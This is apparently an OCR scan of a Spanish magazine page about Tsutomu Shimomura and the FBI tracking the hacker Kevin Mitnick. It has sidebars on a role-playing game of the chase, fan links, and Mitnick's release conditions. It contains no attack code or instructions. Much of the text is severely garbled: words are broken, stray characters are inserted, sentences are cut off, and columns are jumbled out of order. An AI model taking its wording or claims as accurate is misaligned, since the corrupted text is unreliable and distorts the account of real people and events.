“ mentesinte erceptable, pero Shimomura tiene! 
¿(Una prueba « dela existencia. de un:súper hac 
er. Poco. “después el gerente. de Netcom — 
eMitnick-, Roberi| a 
, lo0d,, tiene finalmente una. pista: del “hacker, | h 
Así. lo "comunicará inmediatamente al agente 
é del FBI Levord«Burns; identifica una serie de. 

q de 8d OS “Puntos de f presen- a 

pc 


y EA 

Versos! ciudades de los. Estad 
/ particular de OP (919)55 
Y A aigh en arolina del N rie y utlza- 


con 


m 


. El 
sitio ha sido creado por sus 
seguidores más cercanos y es 

un verdadero 
lugar de culto. 


EL “JUEGO 

DEL 

FUGITIVO 

A Si queréis repetir el 
MN seguimiento de Shimo- ¡ 

Mí mura a Mitnick en una 

| espesieras" juego! de roles, po- | 
, déis hacerlo en el sitio: 
http//ww.well.com/user/jlitt- | 
man/game/ . 

Propedéutico para entender me- | 
jor el suceso y desentrañar | 
los perfiles | 
psicológicos de aquellos que 
son considerados los protago- 
nistas de la historia, com- 
prendidos el “cazador de re- 
compensas”  Shimomura, alter 
ego de Mitnick. 


de explicar. La 1 res-| 
ta LR el directoric 
delfrbrdh pei org" 
hacker muy. o baado: Legio ¿ "Mitnick cae! 
prisio ero; nO por r el FBI, sino por su obse-. 
sión por da los. sistemas de seguridad 
horchoblénerín información . . «noha podi-| 
br do deter nersey;ha voluptuosa ente llevado 
Isu ¡Ni a de saqueo a todos los-lí- | 
mites conocidos. Si realm lo hubiese 
bo ninguno habría sabido > nunca co- 
aesposario > E DNA 


E 


TODOS LOS 
LINKS MITNICK 
Archivos MP3 de can- 
ciones tituladas “Li- 
beren a Kevin Mit- 
nick", la secuencia (del “ataque | 
al ordenador de Shimomura, to- | 
des dos estos links tienen su espa- 
cio en la dirección: | 
http//www.albany.net/-dsiss- 
man/mitnick.html. 
Lamentablemente muchos de ellos 
ya no están activos pero el 
material a disposición es nota- 
ble y no dejará de llamar la 
atención de todos los 
fans del hacker. 


(meri Ps del. ho dd 
Mitnick terminó.en la e 
e. estuvo hasta enero del 


hasta el 21 de ene 


cado los términos de la libertad conc 

1l que por tres años de sulibera- 
"N qón física, le han impedido de tocar, 

rablar o escribir sobre ordenadores 

¡(condiciones comunes de los. Rogers. 
salir de la cárcel), de poseer cualquier | 
forma de a, de código para el 
móvil o cualquier tipo de aparato que 
sea capaz de descriptar datos. 


Pe 


Hegel 


Éá 


